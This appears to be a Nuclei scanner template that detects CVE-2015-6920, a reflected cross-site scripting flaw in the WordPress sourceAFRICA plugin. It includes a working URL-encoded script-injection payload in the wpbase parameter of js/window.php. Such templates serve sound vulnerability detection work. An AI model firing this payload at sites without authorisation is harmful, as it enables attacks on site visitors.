id: CVE-2015-6920 info: name: WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting author: daffainfo severity: medium description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability. remediation: | Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability. reference: - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8169 - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6920 cwe-id: CWE-79 epss-score: 0.0016 epss-percentile: 0.52637 cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: "sourceafrica_project" product: sourceafrica framework: wordpress tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'SourceAfrica' - 'Tags:' condition: and case-insensitive: true - method: GET path: - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a004630440220679e230959445da2c5b25e9a11a7d1a88cb0720728a47b5efe39d7da17a0a141022011ad48075504ec6966d82627ca3f218ffe9c18eb1978544468361e40b1f43cf0:922c64590222798bb761d5b6d8e72950